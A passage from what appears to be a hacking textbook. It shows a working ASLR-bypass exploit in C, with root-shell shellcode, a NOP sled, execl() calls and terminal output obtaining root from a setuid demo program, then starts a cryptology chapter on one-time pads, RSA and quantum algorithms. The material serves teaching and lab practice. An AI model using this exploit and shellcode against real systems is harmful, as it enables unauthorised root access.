reader@hacking:~/booksrc $ gcc -o find_jmpesp find_jmpesp.c
reader@hacking:~/booksrc $ ./find_jmpesp
reader@hacking:~/booksrc $ gcc -g -o aslr_demo aslr_demo.c
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbfcf3480
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbfd39cd0
reader@hacking:~/booksrc $ export SHELLCODE=$(cat shellcode.bin)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfc8d9c3
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./aslr_demo
SHELLCODE will be at 0xbfa0c9c3
reader@hacking:~/booksrc $

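Without the jmp esp instruction at a predictable address, there is no easy way to bounce off of linux-gate. Can you think of a way to bypass ASLR to exploit aslr_demo on the LiveCD?

Applied Knowledge

Situations like this are what makes hacking an art. The state of computer security is a constantly changing landscape, and specific vulnerabilities are discovered and patched every day. However, if you understand the concepts of the core hacking techniques explained in this book, you can apply them in new and inventive ways to solve the problem du jour. Like LEGO bricks, these techniques can be used in millions of different combinations and configurations. As with any art, the more you practice these techniques, the better you'll understand them. With this understanding comes the wisdom to guesstimate offsets and recognize memory segments by their address ranges.

In this case, the problem is still ASLR. Hopefully, you have a few bypass ideas you might want to try out now. Don't be afraid to use the debugger to examine what is actually happening. There are probably several ways to bypass ASLR, and you may invent a new technique. If you don't find a solution, don't worry: I'll explain a method in the next section. But it's worthwhile to think about this problem a little on your own before reading ahead.

A First Attempt

In fact, I had written this chapter before linux-gate was fixed in the Linux kernel, so I had to hack together an ASLR bypass. My first thought was to leverage the execl() family of functions. We've been using the execve() function in our shellcode to spawn a shell, and if you pay close attention (or just read the man page), you'll notice the execve() function replaces the currently running process with the new process image.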

EXEC(3)                Linux Programmer's Manual

NAME
       execl, execlp, execle, execv, execvp - execute a file

SYNOPSIS
       #include <unistd.h>

       extern char **environ;

       int execl(const char *path, const char *arg, ...);
       int execlp(const char *file, const char *arg, ...);
       int execle(const char *path, const char *arg,
                  ..., char * const envp[]);
       int execv(const char *path, char *const argv[]);
       int execvp(const char *file, char *const argv[]);

DESCRIPTION
       The  exec()  family  of  functions  replaces the current process
       image with a new process image.  The functions described in this
       manual page are front-ends for the function execve(2).  (See the
       manual page for execve()  for  detailed  information  about  the
       replacement of the current process.)

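It seems like there could be a weakness here if the memory layout is randomized only when the process is started. Let's test this hypothesis with a piece of code that prints the address of a stack variable and then executes aslr_demo using an execl() function.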

aslr_execl.c

#include <stdio.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
   int stack_var;

   // Print an address from the current stack frame.
   printf("stack_var is at %p\n", &stack_var);

   // Start aslr_demo to see how its stack is arranged.
   execl("./aslr_demo", "aslr_demo", NULL);
}

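When this program is compiled and executed, it will execl() aslr_demo, which also prints the address of a stack variable (buffer). This lets us compare the memory layouts.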

reader@hacking:~/booksrc $ gcc -o aslr_demo aslr_demo.c
reader@hacking:~/booksrc $ gcc -o aslr_execl aslr_execl.c
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbf9f31c0
reader@hacking:~/booksrc $ ./aslr_demo test
buffer is at 0xbffaaf70
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbf832044
buffer is at 0xbf832000
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbf832044 - 0xbf832000"
$1 = 68
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbfa97844
buffer is at 0xbf82f800
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa97844 - 0xbf82f800"
$1 = 2523204
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbfbb0bc4
buffer is at 0xbff3e710
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfbb0bc4 - 0xbff3e710"
$1 = 4291241140
reader@hacking:~/booksrc $ ./aslr_execl
stack_var is at 0xbf9a81b4
buffer is at 0xbf9a8180
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbf9a81b4 - 0xbf9a8180"
$1 = 52
reader@hacking:~/booksrc $

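The first result looks very promising, but further attempts show that there is some degree of randomization happening when the new process is executed with execl(). I'm sure this wasn't always the case, but the progress of open source is rather constant. This isn't much of a problem though, since we have ways to deal with that partial uncertainty.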
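One of the differences printed by GDB above, 4291241140, is really a small negative distance displayed as an unsigned 32-bit value. The sketch below computes the signed distance instead; stack_distance is a hypothetical name, and the addresses are the ones from the four runs shown.

```c
#include <stdint.h>

/* Signed distance a - b between two 32-bit addresses,
 * computed in a wider type so the sign is preserved. */
long long stack_distance(uint32_t a, uint32_t b)
{
    return (long long)a - (long long)b;
}
```

For the third run, stack_distance(0xbfbb0bc4, 0xbff3e710) is -3726156, meaning buffer ended up about 3.5 MB above stack_var rather than just below it.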

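Playing the Odds

Using execl() at least limits the randomness and gives us a ballpark address range. The remaining uncertainty can be handled with a NOP sled. A quick examination of aslr_demo shows that the overflow buffer needs to be 80 bytes to overwrite the stored return address on the stack.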

reader@hacking:~/booksrc $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) run $(perl -e 'print "AAAA"x19 . "BBBB"')
Starting program: /home/reader/booksrc/aslr_demo $(perl -e 'print "AAAA"x19 . "BBBB"')
buffer is at 0xbfc7d3b0

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb) p 20*4
$1 = 80
(gdb) quit
The program is running.  Exit anyway? (y or n) y
reader@hacking:~/booksrc $

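Since we will probably want a rather large NOP sled, in the following exploit the NOP sled and the shellcode will be put after the return address overwrite. This allows us to inject as much of a NOP sled as needed. In this case, a thousand bytes or so should be sufficient.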

aslr_execl_exploit.c

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>  // atoi()
#include <string.h>

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80"; // Standard shellcode

int main(int argc, char *argv[]) {
   unsigned int i, ret, offset;
   char buffer[1000];

   printf("i is at %p\n", &i);

   if(argc > 1) // Set offset.
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset + 200; // Set return address.
   printf("ret addr is %p\n", ret);

   for(i=0; i < 90; i+=4) // Fill buffer with return address.
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer+84, 0x90, 900); // Build NOP sled.
   memcpy(buffer+900, shellcode, sizeof(shellcode));

   execl("./aslr_demo", "aslr_demo", buffer,  NULL);
}

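This code should make sense to you. The value 200 is added to the return address to skip over the first 90 bytes used for the overwrite, so execution lands somewhere in the NOP sled.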

reader@hacking:~/booksrc $ sudo chown root ./aslr_demo
reader@hacking:~/booksrc $ sudo chmod u+s ./aslr_demo
reader@hacking:~/booksrc $ gcc aslr_execl_exploit.c
reader@hacking:~/booksrc $ ./a.out
i is at 0xbfa3f26c
ret addr is 0xb79f6de4
buffer is at 0xbfa3ee80
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfa3f26c - 0xbfa3ee80"
$1 = 1004
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfe9b6cc
ret addr is 0xbfe9b3a8
buffer is at 0xbfe9b2e0
sh-3.2# exit
exit
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfb5a38c
ret addr is 0xbfb5a068
buffer is at 0xbfb20760
Segmentation fault
reader@hacking:~/booksrc $ gdb -q --batch -ex "p 0xbfb5a38c - 0xbfb20760"
$1 = 236588
reader@hacking:~/booksrc $ ./a.out 1004
i is at 0xbfce050c
ret addr is 0xbfce01e8
buffer is at 0xbfce0130
sh-3.2# whoami
root 
sh-3.2#

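As you can see, the randomization occasionally causes the exploit to fail, but it only needs to succeed once. This leverages the fact that we can try the exploit as many times as we want. The same technique also works with the notesearch exploit while ASLR is running. Try writing an exploit to do this.

Once the basic concepts of exploiting programs are understood, countless variations are possible with a little creativity. Since the rules of a program are defined by its creators, exploiting a supposedly secure program is simply a matter of beating them at their own game. New clever methods, such as stack guards and intrusion detection systems (IDSs), try to compensate for these problems, but these solutions aren't perfect either. A hacker's ingenuity tends to find holes in these systems. Just think of the things they didn't think of.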

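Chapter 0x700. Cryptology

Cryptology is defined as the study of cryptography or cryptanalysis. Cryptography is simply the process of communicating secretly through the use of ciphers, and cryptanalysis is the process of cracking or deciphering such secret communications. Historically, cryptology has been of particular interest during wars, when countries used secret codes to communicate with their troops while also trying to break the enemy's codes to infiltrate their communications.

The wartime applications still exist, but the use of cryptography in civilian life is becoming increasingly popular as more critical transactions occur over the Internet. Network sniffing is so common that the paranoid assumption that someone is always sniffing network traffic might not be so paranoid. Passwords, credit card numbers, and other proprietary information can all be sniffed and stolen over unencrypted protocols. Encrypted communication protocols provide a solution to this lack of privacy and allow the Internet economy to function. Without Secure Sockets Layer (SSL) encryption, credit card transactions at popular websites would be either very inconvenient or insecure.

All of this private data is protected by cryptographic algorithms that are probably secure. Currently, cryptosystems that can be proven secure are far too unwieldy for practical use. So in lieu of a mathematical proof of security, cryptosystems that are practically secure are used. This means that shortcuts for defeating these ciphers may exist, but no one has been able to carry them out yet. Of course, there are also cryptosystems that aren't secure at all. This could be due to the implementation, the key size, or simply cryptanalytic weaknesses in the cipher itself. In 1997, under US law, the maximum allowable key size for encryption in exported software was 40 bits. This limit on key size makes the corresponding cipher insecure, as was shown by RSA Data Security and Ian Goldberg, a graduate student at the University of California, Berkeley. RSA posted a challenge to decipher a message encrypted with a 40-bit key, and three and a half hours later, Ian had done just that. This was strong evidence that 40-bit keys aren't large enough for a secure cryptosystem.

Cryptology is relevant to hacking in a number of ways. At the purest level, the challenge of solving a puzzle is enticing to the curious. At a more nefarious level, the secret data protected by that puzzle is perhaps even more alluring. Breaking or circumventing the cryptographic protections of secret data can provide a certain sense of satisfaction, not to mention a sense of the protected data's contents. In addition, strong cryptography is useful in avoiding detection. Expensive network intrusion detection systems designed to sniff network traffic for attack signatures are useless if the attacker is using an encrypted communication channel. Often, the encrypted web access provided for customer security is used by attackers as a difficult-to-monitor attack vector.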

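Information Theory

Many of the concepts of cryptographic security stem from the mind of Claude Shannon. His ideas have influenced the field of cryptography greatly, especially the concepts of diffusion and confusion. Although the following concepts of unconditional security, one-time pads, quantum key distribution, and computational security weren't actually conceived by Shannon, his ideas on perfect secrecy and information theory had great influence on the definitions of security.

Unconditional Security

A cryptographic system is considered unconditionally secure if it cannot be broken, even with infinite computational resources. This implies that cryptanalysis is impossible and that even if every possible key were tried in an exhaustive brute-force attack, it would be impossible to determine which key was the correct one.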

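One-Time Pads

One example of an unconditionally secure cryptosystem is the one-time pad. A one-time pad is a very simple cryptosystem that uses blocks of random data called pads. The pad must be at least as long as the plaintext message to be encoded, and the random data on the pad must be truly random, in the most literal sense of the word. Two identical pads are made: one for the recipient and one for the sender. To encode a message, the sender simply XORs each bit of the plaintext message with the corresponding bit of the pad. After the message is encoded, the pad is destroyed to ensure that it is only used once. The encrypted message can then be sent to the recipient without fear of cryptanalysis, since it cannot be broken without the pad. When the recipient receives the encrypted message, he also XORs each bit of the encrypted message with the corresponding bit of his pad to produce the original plaintext message.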

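While the one-time pad is theoretically impossible to break, in reality it isn't all that practical to use. The security of the one-time pad hinges on the security of the pads. When the pads are distributed to the recipient and the sender, it is assumed that the pad transmission channel is secure. To be truly secure, this could involve a face-to-face meeting and exchange, but for convenience, the pad transmission may be facilitated via yet another cipher. The price of this convenience is that the entire system is now only as strong as its weakest link, which would be the cipher used to transmit the pads. Since the pad consists of random data of the same length as the plaintext message, and since the security of the whole system is only as good as the security of the pad transmission, it usually makes more sense to just send the plaintext message encoded with the same cipher that would have been used to transmit the pad.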

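Quantum Key Distribution

The advent of quantum computation brings many interesting things to the field of cryptology. One of these is a practical implementation of the one-time pad, made possible by quantum key distribution. The mystery of quantum entanglement can provide a reliable and secret method of sending a random string of bits that can be used as a key. This is done using nonorthogonal quantum states in photons.

Without going into too much detail, the polarization of a photon is the oscillation direction of its electric field, which in this case can be along the horizontal, the vertical, or one of the two diagonals. Nonorthogonal simply means the states are separated by an angle that isn't 90 degrees. Curiously enough, it's impossible to determine with certainty which of these four polarizations a single photon has. The rectilinear basis of the horizontal and vertical polarizations is incompatible with the diagonal basis of the two diagonal polarizations, so, due to the Heisenberg uncertainty principle, these two sets of polarizations cannot both be measured. Filters can be used to measure the polarizations: one for the rectilinear basis and one for the diagonal basis. When a photon passes through the correct filter, its polarization won't change, but if it passes through the incorrect filter, its polarization will be randomly modified. This means that any eavesdropping attempt to measure the polarization of a photon has a good chance of scrambling the data, making it apparent that the channel isn't secure.

These strange aspects of quantum mechanics were put to good use by Charles Bennett and Gilles Brassard in the first and probably best-known quantum key distribution scheme, called BB84. First, the sender and receiver agree on a bit representation for the four polarizations, such that each basis has both a 1 and a 0. In this scheme, 1 could be represented by both vertical photon polarization and one of the diagonal polarizations (positive 45 degrees), while 0 could be represented by horizontal polarization and the other diagonal polarization (negative 45 degrees). This way, 1s and 0s can exist both when the rectilinear polarization is measured and when the diagonal polarization is measured.

Then, the sender sends a stream of random photons, each coming from a randomly chosen basis (either rectilinear or diagonal), and these photons are recorded. When the receiver receives a photon, he also randomly chooses to measure it in either the rectilinear basis or the diagonal basis and records the result. Now, the two parties publicly compare which basis they used for each photon, and they keep only the data corresponding to the photons they both measured using the same basis. This doesn't reveal the bit values of the photons, since there are both 1s and 0s in each basis. This makes up the key for the one-time pad.

Since an eavesdropper would ultimately end up changing the polarization of some of these photons and thus scrambling the data, eavesdropping can be detected by computing the error rate of some random subset of the key. If there are too many errors, someone was probably eavesdropping, and the key should be thrown away. If not, the transmission of the key data was secure and private.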

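Computational Security

A cryptosystem is considered to be computationally secure if the best-known algorithm for breaking it requires an unreasonable amount of computational resources and time. This means that it is theoretically possible for an eavesdropper to break the encryption, but it is practically infeasible to do so, since the amount of time and resources necessary would far exceed the value of the encrypted information. Usually, the time needed to break a computationally secure cryptosystem is measured in tens of thousands of years, even with the assumption of a vast array of computational resources. Most modern cryptosystems fall into this category.

It's important to note that the best-known algorithms for breaking cryptosystems are always evolving and being improved. Ideally, a cryptosystem would be defined as computationally secure if the best algorithm for breaking it requires an unreasonable amount of computational resources and time, but there is currently no way to prove that a given encryption-breaking algorithm is and always will be the best one. So, the current best-known algorithm is used instead to measure a cryptosystem's security.

Algorithmic Run Time

Algorithmic run time is a bit different from the run time of a program. Since an algorithm is simply an idea, there's no limit to the processing speed for evaluating the algorithm. This means that an expression of algorithmic run time in minutes or seconds is meaningless.

Without factors such as processor speed and architecture, the important unknown for an algorithm is input size. A sorting algorithm running on 1,000 elements will certainly take longer than the same sorting algorithm running on 10 elements. The input size is generally denoted by n, and each atomic step can be expressed as a number. The run time of a simple algorithm, such as the one that follows, can be expressed in terms of n.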

for(i = 1 to n) {
   Do something;
   Do another thing;
} 
Do one last thing;

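This algorithm loops n times, each time doing two actions, and then does one last action, so the time complexity for this algorithm would be 2n + 1. A more complex algorithm with an additional nested loop tacked on, shown below, would have a time complexity of n² + 2n + 1, since the new action is executed n² times.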

for(x = 1 to n) {
   for(y = 1 to n) {
      Do the new action;
   }
}
for(i = 1 to n) {
   Do something;
   Do another thing;
} 
Do one last thing;

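But this level of detail for time complexity is still too granular. For example, as n becomes larger, the relative difference between 2n + 5 and 2n + 365 becomes less and less. However, as n becomes larger, the relative difference between 2n² + 5 and 2n + 5 becomes larger and larger. This type of generalized trending is what is most important to the run time of an algorithm.

Consider two algorithms, one with a time complexity of 2n + 365 and the other with 2n² + 5. The 2n² + 5 algorithm will outperform the 2n + 365 algorithm on small values of n. The two cross over between n = 13 and n = 14 (at n = 14 they cost 397 and 393 steps, respectively), and for all n of 14 or greater, the 2n + 365 algorithm will outperform the 2n² + 5 algorithm. Since there are only 13 values of n for which the 2n² + 5 algorithm performs better, but an infinite number of values for which the 2n + 365 algorithm performs better, the 2n + 365 algorithm is generally more efficient.

This means that, in general, the growth rate of the time complexity of an algorithm with respect to input size is more important than the time complexity for any fixed input. While this might not always hold true for specific real-world applications, this type of measurement of an algorithm's efficiency tends to be true when averaged over all possible applications.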

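Asymptotic Notation

Asymptotic notation is a way to express an algorithm's efficiency. It's called asymptotic because it deals with the behavior of the algorithm as the input size approaches the asymptotic limit of infinity.

Returning to the examples of the 2n + 365 algorithm and the 2n² + 5 algorithm, we determined that the 2n + 365 algorithm is generally more efficient because it follows the trend of n, while the 2n² + 5 algorithm follows the general trend of n². This means that 2n + 365 is bounded above by a positive multiple of n for all sufficiently large n, and 2n² + 5 is bounded above by a positive multiple of n² for all sufficiently large n.

This sounds kind of confusing, but all it really means is that there exists a positive constant for the trend value and a lower bound on n, such that the trend value multiplied by the constant will always be greater than the time complexity for all n greater than the lower bound. In other words, 2n² + 5 is in the order of n², and 2n + 365 is in the order of n. There's a convenient mathematical notation for this, called big-oh notation, which looks like O(n²) to describe an algorithm that is in the order of n².

A simple way to convert an algorithm's time complexity to big-oh notation is to simply look at the high-order terms, since these will be the terms that matter most as n becomes sufficiently large. So an algorithm with a time complexity of 3n⁴ + 43n³ + 763n + log n + 37 would be in the order of O(n⁴), and 54n⁷ + 23n⁴ + 4325 would be O(n⁷).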
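The verbal definition above can be written out formally. The constants chosen below (c = 3 and the two lower bounds) are just one convenient choice for the two running examples; many others work.

```latex
\begin{align*}
f(n) = O\bigl(g(n)\bigr) &\iff \exists\, c > 0,\ \exists\, n_0 \ \text{such that}\ f(n) \le c \cdot g(n) \ \text{for all } n > n_0 \\
2n + 365 \le 3n \ \text{ for all } n \ge 365 &\implies 2n + 365 = O(n) \\
2n^2 + 5 \le 3n^2 \ \text{ for all } n \ge 3 &\implies 2n^2 + 5 = O(n^2)
\end{align*}
```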

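Symmetric Encryption

Symmetric ciphers are cryptosystems that use the same key to encrypt and decrypt messages. The encryption and decryption process is generally faster than with asymmetric encryption, but key distribution can be difficult.

These ciphers are generally either block ciphers or stream ciphers. A block cipher operates on blocks of a fixed size, usually 64 or 128 bits. The same block of plaintext will always encrypt to the same ciphertext block, using the same key. DES, Blowfish, and AES (Rijndael) are all block ciphers. Stream ciphers generate a stream of pseudo-random bits, usually either one bit or one byte at a time. This is called the keystream, and it is XORed with the plaintext. This is useful for encrypting continuous streams of data. RC4 and LFSR are examples of popular stream ciphers. RC4 is discussed in depth in the section "Wireless 802.11b Encryption."

DES and AES are both popular block ciphers. A lot of thought goes into the construction of block ciphers to make them resistant to known cryptanalytic attacks. Two concepts used repeatedly in block ciphers are confusion and diffusion. Confusion refers to methods used to hide relationships between the plaintext, the ciphertext, and the key. This means that the output bits must involve some complex transformation of the key and plaintext. Diffusion serves to spread the influence of the plaintext bits and the key bits over as much of the ciphertext as possible. Product ciphers combine both of these concepts by using various simple operations repeatedly. Both DES and AES are product ciphers.

DES also uses a Feistel network. It is used in many block ciphers to ensure that the algorithm is invertible. Basically, each block is divided into two halves, left (L) and right (R). Then, in one round of operation, the new left half (L[i]) is set equal to the old right half (R[i-1]), and the new right half (R[i]) is made up of the old left half (L[i-1]) XORed with the output of a function using the old right half (R[i-1]) and the subkey for that round (K[i]). Usually, each round of operation has a separate subkey, which is calculated earlier.

The values for L[i] and R[i] are as follows (the ⊕ symbol denotes the XOR operation):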

L[i] = R[i-1]
R[i] = L[i-1] ⊕ f(R[i-1], K[i])

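DES uses 16 rounds of operation. This number was specifically chosen to defend against differential cryptanalysis. DES's only real known weakness is its key size. Since the key is only 56 bits, the entire keyspace can be checked in an exhaustive brute-force attack in a few weeks on specialized hardware.

Triple-DES fixes this problem by using two DES keys concatenated together for a total key size of 112 bits. Encryption is done by encrypting the plaintext block with the first key, then decrypting with the second key, and then encrypting again with the first key. Decryption is done analogously, but with the encryption and decryption operations switched. The added key size makes a brute-force effort exponentially more difficult.

Most industry-standard block ciphers are resistant to all known forms of cryptanalysis, and the key sizes are usually too big to attempt an exhaustive brute-force attack. However, quantum computation provides some interesting possibilities, which are generally overhyped.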

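Lov Grover's Quantum Search Algorithm

Quantum computation gives the promise of massive parallelism. A quantum computer can store many different states in a superposition (which can be thought of as an array) and perform calculations on all of them at once. This is ideal for brute forcing anything, including block ciphers. The superposition can be loaded up with every possible key, and then the encryption operation can be performed on all the keys at the same time. The tricky part is getting the right value out of the superposition. Quantum computers are weird in that when the superposition is looked at, the whole thing decoheres into a single state. Unfortunately, this decoherence is initially random, and the odds of decohering into each state in the superposition are equal.

Without some way to manipulate the odds of the superposition states, the same effect could be achieved by just guessing keys. Fortuitously, a man named Lov Grover came up with an algorithm that can manipulate the odds of the superposition states. This algorithm allows the odds of a certain desired state to increase while the others decrease. This process is repeated several times until the decohering of the superposition into the desired state is nearly guaranteed. This takes about √n steps, where n is the number of states in the superposition.

Using some basic exponential math skills, you will notice that this just effectively halves the key size for an exhaustive brute-force attack. So, for the ultra paranoid, doubling the key size of a block cipher will make it resistant to even the theoretical possibilities of an exhaustive brute-force attack with a quantum computer.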
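The "basic exponential math" can be spelled out, assuming the step count is about the square root of the number of candidate keys, as in Grover's algorithm, and writing k for the key size in bits (a symbol introduced here for illustration):

```latex
\begin{align*}
n &= 2^{k} && \text{(number of possible $k$-bit keys)} \\
\sqrt{n} &= \sqrt{2^{k}} = 2^{k/2} && \text{(approximate number of quantum search steps)} \\
\sqrt{2^{2k}} &= 2^{k} && \text{(doubling the key size restores the original work factor)}
\end{align*}
```

So a 56-bit DES key would take roughly 2²⁸ steps to search, while a 256-bit key would still take roughly 2¹²⁸.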

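Asymmetric Encryption

Asymmetric ciphers use two keys: a public key and a private key. The public key is made public, while the private key is kept private; hence the clever names. Any message that is encrypted with the public key can only be decrypted with the private key. This removes the issue of key distribution: public keys are public, and by using the public key, a message can be encrypted for the corresponding private key. Unlike symmetric ciphers, there's no need for an out-of-band communication channel to transmit the secret key. However, asymmetric ciphers tend to be quite a bit slower than symmetric ciphers.

RSA

RSA is one of the more popular asymmetric algorithms. The security of RSA is based on the difficulty of factoring large numbers. First, two prime numbers are chosen, P and Q, and their product, N, is computed: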

N = P · Q

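Then, the number of numbers between 1 and N – 1 that are relatively prime to N must be calculated (two numbers are relatively prime if their greatest common divisor is 1). This is known as Euler's totient function, and it is usually denoted by the lowercase Greek letter phi (φ).

For example, φ(9) = 6, since 1, 2, 4, 5, 7, and 8 are relatively prime to 9. It should be easy to notice that if N is prime, φ(N) will be N – 1. A somewhat less obvious fact is that if N is the product of exactly two distinct prime numbers, P and Q, then φ(P · Q) = (P – 1) · (Q – 1). This comes in handy, since φ(N) must be calculated for RSA.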

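An encryption key, E, that is relatively prime to φ(N) must be chosen at random. Then a decryption key, D, must be found that satisfies the following equation, where S is any integer: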

E · D = S · φ(N) + 1

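This can be solved with the extended Euclidean algorithm. The Euclidean algorithm is a very old algorithm that happens to be a very fast way to calculate the greatest common divisor (GCD) of two numbers. The larger of the two numbers is divided by the smaller number, paying attention only to the remainder. Then, the smaller number is divided by the remainder, and the process is repeated until the remainder is zero. The last value of the remainder before it reaches zero is the greatest common divisor of the two original numbers. This algorithm is quite fast, with a run time of O(log₁₀ N). That means that it should take about as many steps to find the answer as the number of digits in the larger number.

In the table below, the GCD of 7253 and 120, written as gcd(7253, 120), is calculated. The table starts by putting the two numbers in columns A and B, with the larger number in column A. Then A is divided by B, and the remainder is put in column R. On the next line, the old B becomes the new A, and the old R becomes the new B. R is calculated again, and this process is repeated until the remainder is zero. The last value of R before zero is the greatest common divisor.

gcd(7253, 120)

| A | B | R |
| --- | --- | --- |
| 7253 | 120 | 53 |
| 120 | 53 | 14 |
| 53 | 14 | 11 |
| 14 | 11 | 3 |
| 11 | 3 | 2 |
| 3 | 2 | 1 |
| 2 | 1 | 0 |

So, the greatest common divisor of 7253 and 120 is 1. That means that 7253 and 120 are relatively prime to each other.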

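The extended Euclidean algorithm finds two integers, J and K, such that

J · A + K · B = R

when gcd(A, B) = R.

This is done by working the Euclidean algorithm backward. In this case, though, the quotients are important. Here is the math from the prior example, with the quotients: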

7253 = 60 · 120 + 53
120 = 2 · 53 + 14
53 = 3 · 14 + 11
14 = 1 · 11 + 3
11 = 3 · 3 + 2
3 = 1 · 2 + 1

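With a little bit of basic algebra, the terms can be moved around for each line so that the remainder is by itself on the left of the equal sign: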

53 = 7253 – 60 · 120
14 = 120 – 2 · 53
11 = 53 – 3 · 14
3 = 14 – 1 · 11
2 = 11 – 3 · 3
1 = 3 – 1 · 2

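Starting from the bottom, it's clear that:

1 = 3 – 1 · 2

The line above that, though, is 2 = 11 – 3 · 3, which gives a substitution for 2:

1 = 3 – 1 · (11 – 3 · 3)
1 = 4 · 3 – 1 · 11

The line above that shows that 3 = 14 – 1 · 11, which can also be substituted in for 3:

1 = 4 · (14 – 1 · 11) – 1 · 11
1 = 4 · 14 – 5 · 11

Of course, the line above that shows that 11 = 53 – 3 · 14, prompting another substitution:

1 = 4 · 14 – 5 · (53 – 3 · 14)
1 = 19 · 14 – 5 · 53

Following the pattern, we use the line that shows 14 = 120 – 2 · 53, resulting in another substitution:

1 = 19 · (120 – 2 · 53) – 5 · 53
1 = 19 · 120 – 43 · 53

And finally, the top line shows that 53 = 7253 – 60 · 120, for a final substitution:

1 = 19 · 120 – 43 · (7253 – 60 · 120)
1 = 2599 · 120 – 43 · 7253
2599 · 120 + (–43) · 7253 = 1

This shows that, with A = 7253 and B = 120, J and K would be –43 and 2599, respectively.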

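The numbers in the previous example were chosen for their relevance to RSA. Assuming the values for P and Q are 11 and 13, N would be 143. Therefore, φ(N) = 120 = (11 – 1) · (13 – 1). Since 7253 is relatively prime to 120, that number makes an excellent value for E.

If you recall, the goal was to find a value for D that satisfies the following equation:

E · D = S · φ(N) + 1

Some basic algebra puts it in a more familiar form:

D · E – S · φ(N) = 1
D · 7253 – S · 120 = 1

Since S can be any integer, this has the same form as J · A + K · B = 1, with K = –S. Using the values from the extended Euclidean algorithm, it's apparent that D = –43. The value for S doesn't really matter, which means this math is done modulo φ(N), or modulo 120. That, in turn, means that a positive equivalent value for D is 77, since 120 – 43 = 77. This can be put into the prior equation from above: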

E · D = S · φ(N) + 1
7253 · 77 = 4654 · 120 + 1

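The values for N and E are distributed as the public key, while D is kept secret as the private key. P and Q are discarded. The encryption and decryption functions are fairly simple.

Encryption: C = M^E (mod N)
Decryption: M = C^D (mod N)

For example, if the message, M, is 98, encryption would be as follows:

98⁷²⁵³ = 76 (mod 143)

The ciphertext would be 76. Then, only someone who knew the value for D could decrypt the message and recover the number 98 from the number 76, as follows:

76⁷⁷ = 98 (mod 143)

Obviously, if the message, M, is larger than N, it must be broken down into chunks that are smaller than N.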

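This process is made possible by Euler's totient theorem. It states that if M and N are relatively prime, with M being the smaller number, then when M is multiplied by itself φ(N) times and divided by N, the remainder will always be 1:

If gcd(M, N) = 1 and M < N, then M^(φ(N)) = 1 (mod N)

Since this is all done modulo N, the following is also true, due to the way multiplication works in modular arithmetic:

M^(φ(N)) · M^(φ(N)) = 1 · 1 (mod N)
M^(2 · φ(N)) = 1 (mod N)

This process could be repeated again and again S times to produce this:

M^(S · φ(N)) = 1 (mod N)

If both sides are multiplied by M, the result is:

M^(S · φ(N)) · M = 1 · M (mod N)
M^(S · φ(N) + 1) = M (mod N)

This equation is basically the core of RSA. A number, M, raised to a power modulo N, produces the original number M again. This is basically a function that returns its own input, which isn't all that interesting by itself. But if this equation could be broken up into two separate parts, then one part could be used to encrypt and the other to decrypt, producing the original message again. This can be done by finding two numbers, E and D, that multiplied together equal S times φ(N) plus 1. Then this value can be substituted into the previous equation:

E · D = S · φ(N) + 1
M^(E · D) = M (mod N)

This is equivalent to:

(M^E)^D = M (mod N)

which can be broken up into two steps:

M^E = C (mod N)
C^D = M (mod N)

And that's basically RSA. The security of the algorithm is tied to keeping D secret. But since N and E are both public values, if N can be factored into the original P and Q, then φ(N) can easily be calculated with (P – 1) · (Q – 1), and then D can be determined with the extended Euclidean algorithm. Therefore, the key sizes for RSA must be chosen with the best-known factoring algorithm in mind to maintain computational security. Currently, the best-known factoring algorithm for large numbers is the number field sieve (NFS). This algorithm has a subexponential run time, which is pretty good, but still not fast enough to crack a 2,048-bit RSA key in a reasonable amount of time.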

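Peter Shor's Quantum Factoring Algorithm

Once again, quantum computation promises amazing increases in computation potential. Peter Shor was able to take advantage of the massive parallelism of quantum computers to efficiently factor numbers using an old number-theory trick.

The algorithm is actually quite simple. Take a number, N, to factor. Choose a value, A, that is less than N. This value should also be relatively prime to N, but assuming that N is the product of two prime numbers (which will always be the case when trying to factor numbers to break RSA), if A isn't relatively prime to N, then A shares one of N's factors, which gcd(A, N) reveals.

Next, load up the superposition with sequential numbers counting up from 1 and feed every one of those values through the function f(x) = A^x (mod N). This is all done at the same time, through the magic of quantum computation. A repeating pattern will emerge in the results, and the period of this repetition must be found. Luckily, this can be done quickly on a quantum computer with a Fourier transform. This period will be called R.

Then, simply calculate gcd(A^(R/2) + 1, N) and gcd(A^(R/2) – 1, N). At least one of these values should be a factor of N. This is possible because A^R = 1 (mod N) and is further explained below.

A^R = 1 (mod N)
(A^(R/2))² = 1 (mod N)
(A^(R/2))² – 1 = 0 (mod N)
(A^(R/2) – 1) · (A^(R/2) + 1) = 0 (mod N)

This means that (A^(R/2) – 1) · (A^(R/2) + 1) is an integer multiple of N. As long as these values don't zero themselves out, one of them will have a factor in common with N.

To crack the previous RSA example, the public value N must be factored. In this case, N equals 143. Next, a value for A is chosen that is relatively prime to and less than N, so A equals 21. The function will look like f(x) = 21^x (mod 143). Every sequential value from 1 up to as high as the quantum computer will allow will be put through this function.

To keep this brief, the assumption will be that the quantum computer has three quantum bits, so the superposition can hold eight values.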

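x = 1	21^1 (mod 143) = 21
x = 2	21^2 (mod 143) = 12
x = 3	21^3 (mod 143) = 109
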